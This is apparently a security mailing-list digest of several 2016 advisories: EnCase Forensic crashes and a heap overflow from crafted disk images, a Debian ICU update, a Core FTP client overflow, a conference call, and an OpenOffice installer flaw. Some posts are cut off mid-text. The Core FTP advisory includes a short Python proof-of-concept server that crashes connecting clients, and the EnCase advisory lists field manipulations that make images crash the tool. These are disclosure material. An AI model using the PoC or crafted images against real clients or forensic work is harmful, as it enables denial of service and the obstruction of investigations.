SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic

[SEC Consult Vulnerability Lab]

SEC Consult Vulnerability Lab Security Advisory < 20161128-0 >
===
  title: Denial of service & heap-based buffer overflow
product: Guidance Software EnCase Forensic Imager & EnCase Forensic
 vulnerable version: EnCase Forensic Imager<= 7.10
 EnCase Forensic (tested with version 7.08.00.137)
  fixed version: -
 CVE number: -
 impact: high
   homepage: https://www.guidancesoftware.com/encase-forensic-imager
  found: 2016-09-30
 by: Wolfgang Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"When time is short and you need to acquire entire volumes or selected
individual folders, EnCase Forensic Imager is your tool of choice. Based on
trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager:
* Is free to download and use
* Requires no installation
* Is a standalone product that does not require an EnCase Forensic license
* Enables acquisition of local drives (network drives are not able to be
  acquired with Imager)
* Provides easy viewing and browsing of potential evidence files, including
  folder structures and file metadata
* Can be deployed via USB stick and used to perform acquisition of a live
  device"

URL: https://www.guidancesoftware.com/encase-forensic-imager


Business recommendation:

SEC Consult recommends not to use Encase Forensic Imager or the Encase Forensic
Suite until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service
Several manipulated hard disk images cause Encase Forensic Imager to crash. A
suspect manipulating the hard drive could potentially hinder an investigator
from using Encase Forensic Imager for creating hard disk images.
Encase Forensic (v7) has been tested and found to be affected as well.

2) Heap-based buffer overflow
Using a manipulated ReiserFS image an attacker can overwrite heap memory on the
investigator's machine. Because of several restrictions SEC Consult was unable
to create an exploit that works reliably within a reasonable timeframe.
However, as with most heap-based buffer overflow vulnerabilities it is possible
that an attacker could gain arbitrary code execution nevertheless.


Proof of concept:
-
SEC Consult has created proof of concept disk images that will crash Encase. 
Those
PoC images will not be released.

 1) Denial of Service
The following list demonstrates cases that cause Encase to crash. The
investigators would be unable to analyze the hard disk/partition/image using the
affected products:
 * Ext3:
  - Several conditions cause Encase Forensic Imager to encounter an div/0
exception. Disk images that were manipulated in the following way
demonstrate this issue. Those crashes have not been further
investigated as to whether code execution is possible.
   + nummer of blocks per group: 0x
   + total numer of blocks: 0x
   + last mount path: 'A'*10
   + volume name: 'A'*10
   + block number of the superblock: 0
   + FS-Id: 'A'*10
  - Manipulating the size of the inode structure value (e.g. 0x) causes
Encase Forensic Imager to write beyond the limits of a previously
allocated (VirtualAlloc) segment.
 * Iso9660:
  - If the length of a file name is specified in a way that it would exceed
the end of the last block, Encase Forensic Imager crashes while trying to
read beyond an allocated segment.
 * ReiserFs:
  - When setting a block size of below 0x200 the application overwrites heap
memory with attacker-supplied data.
 * GPT:
  - When specifying an overly long name (in our setup longer than 0x3fc6) for a
partition, Encase Forensic crashes failing to read memory when trying to
determine the length of the string. The partition table can be constructed
in a way that it can also be used for storing data. However, an investigator
using Encase will not be able to analyze it.

2) Heap-based buffer overflow
The manipulated ReiserFs image that causes the application to overwrite heap
memory can be tuned to overwrite heap-data with attacker-controlled data.

The application calculates a value (here called "dev_block_count") as:

dev_block_count =
   blocksize from image (e.g. 0x200)
 / blocksize of reading device (typically 0x200)
 * number of blocks

.text:0

[SECURITY] [DSA 3725-1] icu security update

[Luciano Bello]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3725-1   secur...@debian.org
https://www.debian.org/security/Luciano Bello
November 27, 2016 https://www.debian.org/security/faq
- -

Package: icu
CVE ID : CVE-2014-9911 CVE-2015-2632 CVE-2015-4844 CVE-2016-0494 
 CVE-2016-6293 CVE-2016-7415
Debian Bug : 838694

Several vulnerabilities were discovered in the International Components
for Unicode (ICU) library.

CVE-2014-9911

Michele Spagnuolo discovered a buffer overflow vulnerability which
might allow remote attackers to cause a denial of service or possibly
execute arbitrary code via crafted text.

CVE-2015-2632

An integer overflow vulnerability might lead into a denial of service
or disclosure of portion of application memory if an attacker has
control on the input file.

CVE-2015-4844

Buffer overflow vulnerabilities might allow an attacker with control
on the font file to perform a denial of service attacker or,
possibly, execute arbitrary code.

CVE-2016-0494

Integer signedness issues were introduced as part of the
CVE-2015-4844 fix.

CVE-2016-6293

A buffer overflow might allow an attacker to perform a denial of
service or disclosure of portion of application memory.

CVE-2016-7415

A stack-based buffer overflow might allow an attacker with control on
the locale string to perform a denial of service and, possibly,
execute arbitrary code.

For the stable distribution (jessie), these problems have been fixed in
version 52.1-8+deb8u4.

For the unstable distribution (sid), these problems have been fixed in
version 57.1-5.

We recommend that you upgrade your icu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQIcBAEBCAAGBQJYOxmOAAoJEG7C3vaP/jd0vqkQAKAMItur4VZLQdyw7yLRDNwN
hZx7Z7w2etBM7bZVulYvOrNWzdfBal45uQ4XVYMlgjOAmGGnBNRcuEZBI7tOFOJ5
euwEz+HQj/T5ZiwjMjP9VbflM3OOgAbHHjvyuiS72n7pKjJFAvIvvIQZ7n2fzbtp
oRWF7qXgtUFgjh/Bk8VLizW/AqfmJnaRpITOWuLldGyqu23iKgBC/m1u5j3uX7gq
YWjbHh66t93IaosforaX6o2B25IMLIAcIlLE1yOFIDsnNffV/Wb38huBodXWDgkd
iUJlaz4uNGYpCG5J2Fy5GVY+ePTFyLNGW9hgvgLiTpqWXN+fo9B2y7nkhUtTDljY
QMgF9oCzdFBAzsbm3EN6thbMr3+/BlH1smWuxthWlzenVWzYRRW9biXiYHhAuTLx
k9v/4A2oCL61uCaHsrc8NbMhI6BUq0hvQJPHrU97ix9U4cRJGPLWSKkKpJVTEjqI
1Xki47FSNTykUXcbgNV1StJ8paL106J8ZHFRdy10p7np+rIR+dujU4Hz5P9hzw07
4aECq/FQGescS2rgpC1QQmUR9qLZdQ0ag9oEmPWHXvoblqii6u3DJyZKTURhWJA8
Wn6FmmlwojYs8nZsuixJXB3a5ExhH3jTfiB1v1DLCjCVAOeAlUkuILSv1SOUXSzo
7xp83+DgrMJ93GY2aHV4
=vHKf
-END PGP SIGNATURE-

Core FTP LE v2.2 Remote SSH/SFTP Buffer Overflow

[apparitionsec]

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===
www.coreftp.com



Product:

Core FTP LE (client)
v2.2 build 1883 

Core FTP LE - free Windows software that includes the client FTP features you 
need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and drop 
support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and much, 
much more.



Vulnerability Type:

Remote SSH/SFTP Buffer Overflow 



CVE Reference:
==
N/A



Vulnerability Details:
=

Core FTP client is vulnerable to remote buffer overflow denial of service when 
connecting to a malicious server using
SSH/SFTP protocol.

Upon receiving an overly long string of junk from the malicious FTP server 
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can be 
seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c005 (first/second chance not available)
eax=035b ebx=4141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0 nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12mov edx,dword ptr [edx]  ds:002b:41414141=




Exploit code(s):
===

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'

port = 22  
s = socket.socket()

payload="A"*77500
s.bind((host, port))
s.listen(5)
 
print 'Listening on port... %i' %port
print 'Connect to me!'
 
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
conn.close()



Exploitation Technique:
===
Remote



Severity Level:
===
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

WorldCIST'2017 - Submission deadline: November 30

[ML]

* Best papers published in several SCI/SSCI-indexed journals
** Proceedings by Springer, indexed by ISI, Scopus, DBLP, EI-Compendex, etc.

-
WorldCIST'17 - 5th World Conference on Information Systems and Technologies 
Porto Santo Island, Madeira, Portugal
11th-13th of April 2017
http://www.worldcist.org/
-


SCOPE

The WorldCist'17 - 5th World Conference on Information Systems and 
Technologies, to be held at Porto Santo Island, Madeira, Portugal, 11 - 13 
April 2017, is a global forum for researchers and practitioners to present and 
discuss the most recent innovations, trends, results, experiences and concerns 
in the several perspectives of Information Systems and Technologies.

We are pleased to invite you to submit your papers to WorldCist'17 
(http://www.worldcist.org/). All submissions will be reviewed on the basis of 
relevance, originality, importance and clarity.


THEMES

Submitted papers should be related with one or more of the main themes proposed 
for the Conference:

A) Information and Knowledge Management (IKM);
B) Organizational Models and Information Systems (OMIS);
C) Software and Systems Modeling (SSM);
D) Software Systems, Architectures, Applications and Tools (SSAAT);
E) Multimedia Systems and Applications (MSA);
F) Computer Networks, Mobility and Pervasive Systems (CNMPS);
G) Intelligent and Decision Support Systems (IDSS);
H) Big Data Analytics and Applications (BDAA);
I) Human-Computer Interaction (HCI);
J) Ethics, Computers and Security (ECS)
K) Health Informatics (HIS);
L) Information Technologies in Education (ITE);
M) Information Technologies in Radiocommunications (ITR).


TYPES of SUBMISSIONS AND DECISIONS

Four types of papers can be submitted:

- Full paper: Finished or consolidated R works, to be included in one of the 
Conference themes. These papers are assigned a 10-page limit.

- Short paper: Ongoing works with relevant preliminary results, open to 
discussion. These papers are assigned a 7-page limit.

- Poster paper: Initial work with relevant ideas, open to discussion. These 
papers are assigned to a 4-page limit.

- Company paper: Companies' papers that show practical experience, R & D, 
tools, etc., focused on some topics of the conference. These papers are 
assigned to a 4-page limit.

Submitted papers must comply with the format of Advances in Intelligent Systems 
and Computing Series (see Instructions for Authors at Springer Website or 
download a DOC example) be written in English, must not have been published 
before, not be under review for any other conference or publication and not 
include any information leading to the authors’ identification. Therefore, the 
authors’ names, affiliations and bibliographic references should not be 
included in the version for evaluation by the Program Committee. This 
information should only be included in the camera-ready version, saved in Word 
or Latex format and also in PDF format. These files must be accompanied by the 
Consent to Publication form filled out, in a ZIP file, and uploaded at the 
conference management system.

All papers will be subjected to a “double-blind review” by at least two members 
of the Program Committee.

Based on Program Committee evaluation, a paper can be rejected or accepted by 
the Conference Chairs. In the later case, it can be accepted as the type 
originally submitted or as another type. Thus, full papers can be accepted as 
short papers or poster papers only. Similarly, short papers can be accepted as 
poster papers only. In these cases, the authors will be allowed to maintain the 
original number of pages in the camera-ready version.

The authors of accepted poster papers must also build and print a poster to be 
exhibited during the Conference. This poster must follow an A1 or A2 vertical 
format. The Conference can includes Work Sessions where these posters are 
presented and orally discussed, with a 5 minute limit per poster.

The authors of accepted full papers will have 15 minutes to present their work 
in a Conference Work Session; approximately 5 minutes of discussion will follow 
each presentation. The authors of accepted short papers and company papers will 
have 11 minutes to present their work in a Conference Work Session; 
approximately 4 minutes of discussion will follow each presentation.


PUBLICATION & INDEXING

To ensure that a full paper, short paper, poster paper or company paper is 
published in the Proceedings, at least one of the authors must be fully 
registered by the 8th of January 2017, and the paper must comply with the 
suggested layout and page-limit. Additionally, all recommended changes must be 
addressed by the authors before they submit the camera-ready version.

No more than one paper per registration will be published in the Conference 
Proceedings. An extra fee must be paid for publication of 

CVE 2016-6803: Apache OpenOffice Unquoted Search Path Vulnerability

[Apache OpenOffice Security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256


CVE-2016-6803

Apache OpenOffice Advisory


Title: Windows Installer Can Enable Privileged Trojan Execution

Version 1.0
Announced October 11, 2016

Description

The Apache OpenOffice installer for Windows contained a defective
operation that could trigger execution of unwanted software
installed by a Trojan Horse application.  The installer defect 
is known as an "unquoted Windows search path vulnerability."

In the case of Apache OpenOffice installers for Windows, the PC must
have previously been infected by a Trojan Horse application (or user) 
running with administrator privilege.  Any installer with the unquoted 
search path vulnerability becomes a delayed trigger for the exploit.  
The exploit may already have operated on the user's PC.

Severity: Medium

There are no known exploits of this vulnerability.
A proof-of-concept demonstration exists.

Vendor: The Apache Software Foundation

Versions Affected:

All Apache OpenOffice versions 4.1.2 and older 
are affected.  Old OpenOffice.org versions are also
affected.


Mitigation:

Install Apache OpenOffice 4.1.3 for the latest maintenance and 
cumulative security fixes.  Use .

If instead of a typical installation you use a custom-installation
option to change the location where Apache OpenOffice is installed,
use a location that has no spaces in its full-path name.


Defenses and Work-Arounds:

If you are unable to update to 4.1.3, there are other 
precautions that can be taken.  These precautions are also 
recommended as protection against other software that may 
have the unquoted search path vulnerability.

Ensure that there are no programs installed at the
top-level folder (usually C:\) where Windows is installed.  
All are dangerous, especially ones named "Program", whether
"Program.exe" or some other variation.

If such programs are found, install or update to current 
anti-virus/-malware software.  Perform a complete system scan.  
The scan may provide for removal of programs where there should 
not be any.  If that does not happen, it is necessary to remove
any Program.exe and others manually using administrator privilege.


Further Information:

For additional information and assistance, consult the Apache
OpenOffice Community Forums,  or 
make requests to the  public
mailing list.  Defects not involving suspected security
vulnerabilities can be reported via
.

  
The latest information on Apache OpenOffice security bulletins 
can be found at the Bulletin Archive page 
.

Credits: 

The Apache OpenOffice project acknowledges the reporting and
analysis for CVE-2016-6803 by Cyril Vallicari.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCAAGBQJX/C+GAAoJEPluif/UVmKK0VkH/0+K2SNXK1e9ccRjo71/Ns3/
KRK8w/7MqpnSoFIRXD7tn8eB/GY/RwuqlMCkf0zAvif6uzhe/OPgf9JYt22k4eIS
trR61K4SBicyZFpe9HmUrIH9Ucvdgy9Vu6VgOBFger7C39fcyUfnI/1S9wAXjb6y
Yab0/woIVuJxVX7u33kYOS+G52NVzxV4+qm2dhjwISYwxkNCEGh10zpTIIk1VnB3
p3JCGQ4k/tG2Fu30/qap1OmfvgHVP6qBl7b47ZCekc6JErSlGoJ8ZE6PJnNXq92A
0/YjlAUCGguaAg5ec18Qnkm2Ef6anmViBxoPgtxt38cCHV63tuWn7uZnCVKn1qk=
=aKVN
-END PGP SIGNATURE-